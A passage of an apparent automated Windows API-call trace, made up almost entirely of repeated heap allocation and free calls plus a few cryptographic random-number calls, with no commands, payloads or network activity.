returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead30 | out: hHeap=0x2b0000) returned 1 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0033.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0033.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac90 | out: hHeap=0x2b0000) returned 1 [0033.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0033.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb078 | out: hHeap=0x2b0000) returned 1 [0033.114] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.114] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.115] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac90 [0033.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.115] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.115] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.116] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eb078 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d18 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead30 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2ecd18 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9520 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.120] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.120] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.120] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.120] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.120] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead30 | out: hHeap=0x2b0000) returned 1 [0033.120] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0033.120] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecd18 | out: hHeap=0x2b0000) returned 1 [0033.120] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0033.120] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0033.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) 